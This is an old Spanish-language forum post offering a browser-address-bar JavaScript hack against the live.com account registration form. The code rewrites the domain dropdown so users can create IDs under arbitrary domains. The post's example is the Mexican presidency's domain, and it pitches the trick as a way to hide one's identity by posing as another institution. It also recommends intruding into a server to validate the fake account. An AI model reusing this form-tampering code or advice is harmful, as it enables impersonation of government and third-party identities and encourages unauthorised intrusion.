Cuentas Live.com y el Hack para cambiar de dominios.

5 views
Skip to first unread message

Ricardo de Jesús Pelcastre Cervantes

unread,
Nov 16, 2006, 2:38:15 PM11/16/06
to pozarica
Recientemente se creo live.com para cuentas al servicio de Microsoft
pero se encontro el siguiente bug en un identificador del registro de
cuentas.

Una vez entrando en el area de registro en live.com:
http://get.live.com/getlive/overview Tenemos que añadir en nuestra
barra de direcciones del navegador añadir el siguiente enlace:

javascript: var p = 'live.'; var ds = new Array('com', 'cn', 'fr',
'it', 'mx', 'nl'); for (var i = 0; i < ds.length; i
++){document.getElementById('idomain').options[i] = new Option(p +
ds[i], p + ds[i])} alert('dominios añadidos satisfactoriamente');

Lo ejecutamos y estaran los dominios listos para usarse. Otra
referencia mas de seguridad es que podemos modificar el script y crear
una cuenta que queramos con dominio de cualquier lado y te preguntaras
para que sirve esto.

Teniendo curia se modifica el Javascript para poner unos resultados
distintos a live.com y puede ser usado por personas que no quieren que
se revele la identidad ocupando un nombre de usuario y nombre de
dominio ajeno y de otra compañia o institucion, la problematica
unicamente es que el correo no estara validado.

javascript: var p = 'presidencia.'; var ds = new Array('com', 'net',
'org', 'gov', 'mx', 'gob.mx'); for (var i = 0; i < ds.length; i
++){document.getElementById('idomain').options[i] = new Option(p +
ds[i], p + ds[i])} alert('dominios añadidos satisfactoriamente');

En el ejemplo anterior podriamos crear un id del tipo:
usu...@presidencia.gob.mx Se puede usar en el MSN aunque no estara del
todo validada esa cuenta y no podran disponer de una bandeja de entrada
ni nada por el estilo, ventaja: seguridad social, prevencion y mas.

Se puede validar entrando a un servidor (haciendo una intrusion)
ocupando un webmail o algo similar creando momentaneamente unicamente
para validar el id que se creo.

Saludos.

Reply all
Reply to author
Forward
0 new messages